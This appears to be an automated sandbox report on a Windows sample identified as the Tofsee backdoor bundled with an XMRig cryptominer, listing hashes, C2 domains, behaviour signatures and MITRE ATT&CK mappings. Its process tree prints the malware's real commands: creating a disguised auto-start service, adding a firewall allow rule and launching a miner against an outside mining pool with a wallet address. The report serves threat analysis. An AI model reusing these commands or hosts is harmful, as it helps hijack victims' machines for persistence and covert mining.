Overview

overview

10

Static

static

9d1fe9a266...ac.exe

windows7_x64

10

9d1fe9a266...ac.exe

windows10-2004_x64

10

Analysis

  • max time kernel
    151s
  • max time network
    151s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20220414-en
  • submitted
    08-06-2022 09:18

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    9d1fe9a2662b8197482fd35c451577ac.exe

  • Size

    309KB

  • MD5

    9d1fe9a2662b8197482fd35c451577ac

  • SHA1

    da070a55592640ca42b9e4f38a3f7c3eee2522c1

  • SHA256

    de2146a97f1318d0957c808c23fa813c64955ced2187cdd2cef9d4971f5fc3a5

  • SHA512

    34ad51dd9206777d24b680c2fe329d876e711c143be5aa8c3ebee52409c4fe0b14ff8378ef805c307236dbd62d991eaf41cdd6403057e6f05305b7cb40fe704a

Score
10/10
tofseexmrigevasionminerpersistencetrojan

Malware Config

Extracted

Family

tofsee

C2

svartalfheim.top

jotunheim.name

Signatures

  • Tofsee

    Backdoor/botnet which carries out malicious activities based on commands from a C2 server.

    trojantofsee
  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

    minerxmrig
  • XMRig Miner Payload 2 IoCs
    miner
  • Creates new service(s) 1 TTPs
    persistence
  • Executes dropped EXE 1 IoCs
  • Modifies Windows Firewall 1 TTPs 1 IoCs
    evasion
  • Sets service image path in registry 2 TTPs 1 IoCs
    persistence
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Drops file in System32 directory 2 IoCs
  • Suspicious use of SetThreadContext 2 IoCs
  • Launches sc.exe 3 IoCs

    Sc.exe is a Windows utlilty to control services on the system.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Program crash 2 IoCs
  • Modifies data under HKEY_USERS 7 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of WriteProcessMemory 28 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\9d1fe9a2662b8197482fd35c451577ac.exe
    "C:\Users\Admin\AppData\Local\Temp\9d1fe9a2662b8197482fd35c451577ac.exe"
    1⤵
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:3304
    • C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /C mkdir C:\Windows\SysWOW64\iboyrjta\
      2⤵
        PID:3184
      • C:\Windows\SysWOW64\cmd.exe
        "C:\Windows\System32\cmd.exe" /C move /Y "C:\Users\Admin\AppData\Local\Temp\yhjbzepq.exe" C:\Windows\SysWOW64\iboyrjta\
        2⤵
          PID:3344
        • C:\Windows\SysWOW64\sc.exe
          "C:\Windows\System32\sc.exe" create iboyrjta binPath= "C:\Windows\SysWOW64\iboyrjta\yhjbzepq.exe /d\"C:\Users\Admin\AppData\Local\Temp\9d1fe9a2662b8197482fd35c451577ac.exe\"" type= own start= auto DisplayName= "wifi support"
          2⤵
          • Launches sc.exe
          PID:1152
        • C:\Windows\SysWOW64\sc.exe
          "C:\Windows\System32\sc.exe" description iboyrjta "wifi internet conection"
          2⤵
          • Launches sc.exe
          PID:2284
        • C:\Windows\SysWOW64\sc.exe
          "C:\Windows\System32\sc.exe" start iboyrjta
          2⤵
          • Launches sc.exe
          PID:4156
        • C:\Windows\SysWOW64\netsh.exe
          "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul
          2⤵
          • Modifies Windows Firewall
          PID:4356
        • C:\Windows\SysWOW64\WerFault.exe
          C:\Windows\SysWOW64\WerFault.exe -u -p 3304 -s 1040
          2⤵
          • Program crash
          PID:1756
      • C:\Windows\SysWOW64\iboyrjta\yhjbzepq.exe
        C:\Windows\SysWOW64\iboyrjta\yhjbzepq.exe /d"C:\Users\Admin\AppData\Local\Temp\9d1fe9a2662b8197482fd35c451577ac.exe"
        1⤵
        • Executes dropped EXE
        • Suspicious use of SetThreadContext
        • Suspicious use of WriteProcessMemory
        PID:1796
        • C:\Windows\SysWOW64\svchost.exe
          svchost.exe
          2⤵
          • Sets service image path in registry
          • Drops file in System32 directory
          • Suspicious use of SetThreadContext
          • Modifies data under HKEY_USERS
          • Suspicious use of WriteProcessMemory
          PID:5088
          • C:\Windows\SysWOW64\svchost.exe
            svchost.exe -o fastpool.xyz:10060 -u 9mLwUkiK8Yp89zQQYodWKN29jVVVz1cWDFZctWxge16Zi3TpHnSBnnVcCDhSRXdesnMBdVjtDwh1N71KD9z37EzgKSM1tmS.60000 -p x -k -a cn/half
            3⤵
            • Suspicious use of AdjustPrivilegeToken
            PID:4428
        • C:\Windows\SysWOW64\WerFault.exe
          C:\Windows\SysWOW64\WerFault.exe -u -p 1796 -s 508
          2⤵
          • Program crash
          PID:5024
      • C:\Windows\SysWOW64\WerFault.exe
        C:\Windows\SysWOW64\WerFault.exe -pss -s 444 -p 3304 -ip 3304
        1⤵
          PID:4844
        • C:\Windows\SysWOW64\WerFault.exe
          C:\Windows\SysWOW64\WerFault.exe -pss -s 556 -p 1796 -ip 1796
          1⤵
            PID:1156

          Network

          MITRE ATT&CK Matrix ATT&CK v6

          Initial Access

          Execution

          Persistence

          New Service

          1
          T1050

          Modify Existing Service

          1
          T1031

          Registry Run Keys / Startup Folder

          1
          T1060

          Privilege Escalation

          New Service

          1
          T1050

          Defense Evasion

          Modify Registry

          1
          T1112

          Credential Access

          Discovery

          Query Registry

          1
          T1012

          System Information Discovery

          2
          T1082

          Lateral Movement

          Collection

          Exfiltration

          Command and Control

          Impact

          Replay Monitor

          Loading Replay Monitor...

          Downloads

          • C:\Users\Admin\AppData\Local\Temp\yhjbzepq.exe
            Filesize

            11.0MB

            MD5

            bba5dcdce821c38cea573971d911d35f

            SHA1

            6b24e9c792b39d1e09a2f6199549a05ec22e79cb

            SHA256

            64218729ce8040779f328d08fd1063078c9a8aa5b6847de8255087e5ebaffc82

            SHA512

            ba9b00d1d4f7b7007101f28fa2652be4eba08c86843f2b11693cd8e5c3e627844af9f41449caf4f9950e7c190e172f067b07ce80e452c4f04e39a7f5bc702a8f

            Download Submit
          • C:\Windows\SysWOW64\iboyrjta\yhjbzepq.exe
            Filesize

            11.0MB

            MD5

            bba5dcdce821c38cea573971d911d35f

            SHA1

            6b24e9c792b39d1e09a2f6199549a05ec22e79cb

            SHA256

            64218729ce8040779f328d08fd1063078c9a8aa5b6847de8255087e5ebaffc82

            SHA512

            ba9b00d1d4f7b7007101f28fa2652be4eba08c86843f2b11693cd8e5c3e627844af9f41449caf4f9950e7c190e172f067b07ce80e452c4f04e39a7f5bc702a8f

            Download Submit
          • memory/1152-137-0x0000000000000000-mapping.dmp
            Download
          • memory/1796-148-0x0000000000400000-0x00000000004F3000-memory.dmp
            Filesize

            972KB

            Download
          • memory/1796-146-0x000000000053E000-0x000000000054E000-memory.dmp
            Filesize

            64KB

            Download
          • memory/2284-138-0x0000000000000000-mapping.dmp
            Download
          • memory/3184-134-0x0000000000000000-mapping.dmp
            Download
          • memory/3304-131-0x00000000005D0000-0x00000000006D0000-memory.dmp
            Filesize

            1024KB

            Download
          • memory/3304-132-0x0000000002260000-0x0000000002273000-memory.dmp
            Filesize

            76KB

            Download
          • memory/3304-133-0x0000000000400000-0x00000000004F3000-memory.dmp
            Filesize

            972KB

            Download
          • memory/3304-147-0x0000000000400000-0x00000000004F3000-memory.dmp
            Filesize

            972KB

            Download
          • memory/3344-135-0x0000000000000000-mapping.dmp
            Download
          • memory/4156-139-0x0000000000000000-mapping.dmp
            Download
          • memory/4356-141-0x0000000000000000-mapping.dmp
            Download
          • memory/4428-175-0x0000000001030000-0x0000000001121000-memory.dmp
            Filesize

            964KB

            Download
          • memory/4428-169-0x0000000000000000-mapping.dmp
            Download
          • memory/4428-170-0x0000000001030000-0x0000000001121000-memory.dmp
            Filesize

            964KB

            Download
          • memory/5088-143-0x00000000012F0000-0x0000000001305000-memory.dmp
            Filesize

            84KB

            Download
          • memory/5088-151-0x0000000003000000-0x000000000320F000-memory.dmp
            Filesize

            2.1MB

            Download
          • memory/5088-154-0x0000000002760000-0x0000000002766000-memory.dmp
            Filesize

            24KB

            Download
          • memory/5088-157-0x0000000002770000-0x0000000002780000-memory.dmp
            Filesize

            64KB

            Download
          • memory/5088-160-0x00000000033D0000-0x00000000033D5000-memory.dmp
            Filesize

            20KB

            Download
          • memory/5088-163-0x0000000007E80000-0x000000000828B000-memory.dmp
            Filesize

            4.0MB

            Download
          • memory/5088-166-0x00000000033E0000-0x00000000033E7000-memory.dmp
            Filesize

            28KB

            Download
          • memory/5088-150-0x00000000012F0000-0x0000000001305000-memory.dmp
            Filesize

            84KB

            Download
          • memory/5088-149-0x00000000012F0000-0x0000000001305000-memory.dmp
            Filesize

            84KB

            Download
          • memory/5088-142-0x0000000000000000-mapping.dmp
            Download